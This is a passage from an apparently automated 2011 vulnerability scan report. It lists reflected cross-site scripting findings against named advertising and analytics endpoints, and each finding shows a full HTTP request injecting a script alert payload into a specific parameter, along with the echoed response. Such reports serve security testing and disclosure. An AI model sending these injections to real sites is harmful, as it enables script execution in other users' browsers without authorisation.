P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:43:04 GMT
Content-Length: 446

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1921728841ee'-alert(1)-'b206036ced2&referrer=http://www.politico.com/index.html&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1921728841ee%27-al
...[SNIP]...

3.22. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 27705<script>alert(1)</script>7547e8e3a83 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e855170227705<script>alert(1)</script>7547e8e3a83&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27180&s=27181&a=22456
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 01 Nov 2011 01:32:29 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=fd834518-43c5-4956-b6b8-0539a9853af8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e855170227705<script>alert(1)</script>7547e8e3a83)

3.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9c756<script>alert(1)</script>098041de254 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=79c756<script>alert(1)</script>098041de254&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:47 GMT
Date: Mon, 31 Oct 2011 19:04:47 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"79c756<script>alert(1)</script>098041de254", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.24. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 10d82<script>alert(1)</script>361b9bb5076 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=39&c4=53547&c5=31162&c6=&c10=5002310d82<script>alert(1)</script>361b9bb5076&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 15 Nov 2011 01:29:09 GMT
Date: Tue, 01 Nov 2011 01:29:09 GMT
Content-Length: 1248
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"39", c4:"53547", c5:"31162", c6:"", c10:"5002310d82<script>alert(1)</script>361b9bb5076", c15:"", c16:"", r:""});



3.25. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 8617f<script>alert(1)</script>a248be74c7f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=8617f<script>alert(1)</script>a248be74c7f&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:55 GMT
Date: Mon, 31 Oct 2011 19:04:55 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8617f<script>alert(1)</script>a248be74c7f", c16:"", r:""});



3.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fbe3c<script>alert(1)</script>bedb297f23f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888fbe3c<script>alert(1)</script>bedb297f23f&c3=2&c4=&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:49 GMT
Date: Mon, 31 Oct 2011 19:04:49 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888fbe3c<script>alert(1)</script>bedb297f23f", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f8430<script>alert(1)</script>d63b8fdb4e0 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2f8430<script>alert(1)</script>d63b8fdb4e0&c4=&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:51 GMT
Date: Mon, 31 Oct 2011 19:04:51 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2f8430<script>alert(1)</script>d63b8fdb4e0", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3f385<script>alert(1)</script>943c461294 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=3f385<script>alert(1)</script>943c461294&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:52 GMT
Date: Mon, 31 Oct 2011 19:04:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"3f385<script>alert(1)</script>943c461294", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 3b297<script>alert(1)</script>70c3d1f0ea5 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=3b297<script>alert(1)</script>70c3d1f0ea5&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:53 GMT
Date: Mon, 31 Oct 2011 19:04:53 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"3b297<script>alert(1)</script>70c3d1f0ea5", c6:"", c10:"", c15:"", c16:"", r:""});



3.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7bd68<script>alert(1)</script>202b4b7f415 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=7bd68<script>alert(1)</script>202b4b7f415&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:54 GMT
Date: Mon, 31 Oct 2011 19:04:54 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"7bd68<script>alert(1)</script>202b4b7f415", c10:"", c15:"", c16:"", r:""});



3.31. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 76a4e<script>alert(1)</script>c98d370326b was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerId=309045726001 HTTP/1.1
Host: c.brightcove.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://admin.brightcove.com/viewer/us20111031.1743/federatedVideoUI/BrightcovePlayer.swf
Content-type: application/x-amf
Content-Length: 506

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q8a55a82739fb58246a53844b649d6fe5c5e225a5
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:30:42 GMT
Server:
Content-Length: 5078

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A.9.e....eAQ~~,AAAAAETmrZQ~,EVFEM4AKJdT-Wv9cQWadwt8FUbtX2ID_.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Br6..M...ivideoPlayer76a4e<script>alert(1)</script>c98d370326b..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

3.32. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ci parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RX1mACGyl_437413582.html

Issue detail

The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f249"><script>alert(1)</script>9d0a7ef868d was submitted in the ci parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RX1mACGyl_437413582.html?&rtbhost=rts-rr19.sldc.dataxu.net&btid=OGMwMmFmNGEtN2IxMC00NGIwLWJkZmMtNTNjMWVlNzM4NzcxfE9GVXk4Y1owekF8MTMyMDExMzg4MjQzNnwxfDBGTXVtU0ZwSFp8MFJYMW1BQ0d5bHwwYWRmMjc4YS01Yzg0LTRlMDEtOGQ0ZS0wMGU5YjNjODVlYTF8MjY2ODgyfDE0MDAwMHw0MC4wfDA&ei=OPENX&wp_exchange=AAABM1zrRnX1_dFqhlWg4Gfo49TdjP-pKStRig&js=0&ob=1&ccw=SUFCMTEjMC4xNzAyNzY3fElBQjEyIzAuMTUxNTk3NjM&ci=0CV8fZRXhA1f249"><script>alert(1)</script>9d0a7ef868d&s=http%3A%2F%2Fwww.politico.com%2F&ts=1320113882462&geo=VVN8VFh8NjIzfDc1MjA3fA&rnd=2418593018510186&l=fGVufA&v=0&epid=T1g1NzAx&euid=ZjcxZmQzZDktZTYwMC1jYmNkLTFlNGQtZTQ0MjQ2YWU3NWJl&refurl=aHR0cDovL21lZGlhc2VydmljZXMtZC5vcGVueGVudGVycHJpc2UuY29tL3cvMS4wL2Fmcj9hdWlkPTM2ODIzJmNiPUlOU0VSVF9SQU5ET01fTlVNQkVSX0hFUkUmcmQ9NjAmcm09MjUmcmM9Mw HTTP/1.1
Host: cdn.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36823&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=4
Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1; optout=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:18:45 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1;Path=/;Domain=.w55c.net;Expires=Thu, 31-Oct-13 02:18:45 GMT
Cache-Control: no-store
pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 ttn061008 (MII-APC/2.1)
Content-Length: 377

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=810249"></IFRAME><br/>
<script type="text/javascript" src="http://cti.w55c.net/ct/creative_add_on.js?w=300&h=250&pos=top-right&zindex=0&ci=0CV8fZRXhA1f249"><script>alert(1)</script>9d0a7ef868d&ei=OPENX&ob=1">
...[SNIP]...

3.33. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ei parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RX1mACGyl_437413582.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f54"><script>alert(1)</script>846dc866363 was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RX1mACGyl_437413582.html?&rtbhost=rts-rr19.sldc.dataxu.net&btid=OGMwMmFmNGEtN2IxMC00NGIwLWJkZmMtNTNjMWVlNzM4NzcxfE9GVXk4Y1owekF8MTMyMDExMzg4MjQzNnwxfDBGTXVtU0ZwSFp8MFJYMW1BQ0d5bHwwYWRmMjc4YS01Yzg0LTRlMDEtOGQ0ZS0wMGU5YjNjODVlYTF8MjY2ODgyfDE0MDAwMHw0MC4wfDA&ei=OPENX28f54"><script>alert(1)</script>846dc866363&wp_exchange=AAABM1zrRnX1_dFqhlWg4Gfo49TdjP-pKStRig&js=0&ob=1&ccw=SUFCMTEjMC4xNzAyNzY3fElBQjEyIzAuMTUxNTk3NjM&ci=0CV8fZRXhA&s=http%3A%2F%2Fwww.politico.com%2F&ts=1320113882462&geo=VVN8VFh8NjIzfDc1MjA3fA&rnd=2418593018510186&l=fGVufA&v=0&epid=T1g1NzAx&euid=ZjcxZmQzZDktZTYwMC1jYmNkLTFlNGQtZTQ0MjQ2YWU3NWJl&refurl=aHR0cDovL21lZGlhc2VydmljZXMtZC5vcGVueGVudGVycHJpc2UuY29tL3cvMS4wL2Fmcj9hdWlkPTM2ODIzJmNiPUlOU0VSVF9SQU5ET01fTlVNQkVSX0hFUkUmcmQ9NjAmcm09MjUmcmM9Mw HTTP/1.1
Host: cdn.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36823&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=4
Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1; optout=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:18:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1;Path=/;Domain=.w55c.net;Expires=Thu, 31-Oct-13 02:18:33 GMT
Cache-Control: no-store
pragma: no-cache
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 ttn161181010000 (MII-APC/2.1)
Content-Length: 377

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=810249"></IFRAME><br/>
<script type="text/javascript" src="http://cti.w55c.net/ct/creative_add_on.js?w=300&h=250&pos=top-right&zindex=0&ci=0CV8fZRXhA&ei=OPENX28f54"><script>alert(1)</script>846dc866363&ob=1">
...[SNIP]...

3.34. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RX1mACGyl_437413582.html

Issue detail

The value of the ob request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e929"><script>alert(1)</script>558d47ebcdd was submitted in the ob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RX1mACGyl_437413582.html?&rtbhost=rts-rr19.sldc.dataxu.net&btid=OGMwMmFmNGEtN2IxMC00NGIwLWJkZmMtNTNjMWVlNzM4NzcxfE9GVXk4Y1owekF8MTMyMDExMzg4MjQzNnwxfDBGTXVtU0ZwSFp8MFJYMW1BQ0d5bHwwYWRmMjc4YS01Yzg0LTRlMDEtOGQ0ZS0wMGU5YjNjODVlYTF8MjY2ODgyfDE0MDAwMHw0MC4wfDA&ei=OPENX&wp_exchange=AAABM1zrRnX1_dFqhlWg4Gfo49TdjP-pKStRig&js=0&ob=13e929"><script>alert(1)</script>558d47ebcdd&ccw=SUFCMTEjMC4xNzAyNzY3fElBQjEyIzAuMTUxNTk3NjM&ci=0CV8fZRXhA&s=http%3A%2F%2Fwww.politico.com%2F&ts=1320113882462&geo=VVN8VFh8NjIzfDc1MjA3fA&rnd=2418593018510186&l=fGVufA&v=0&epid=T1g1NzAx&euid=ZjcxZmQzZDktZTYwMC1jYmNkLTFlNGQtZTQ0MjQ2YWU3NWJl&refurl=aHR0cDovL21lZGlhc2VydmljZXMtZC5vcGVueGVudGVycHJpc2UuY29tL3cvMS4wL2Fmcj9hdWlkPTM2ODIzJmNiPUlOU0VSVF9SQU5ET01fTlVNQkVSX0hFUkUmcmQ9NjAmcm09MjUmcmM9Mw HTTP/1.1
Host: cdn.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36823&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=4
Cookie: wfivefivec=0adf278a-5c84-4e01-8d4e-00e9b3c85ea1; optout=1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:18:40 GMT
Server: Jetty(6.1.22)
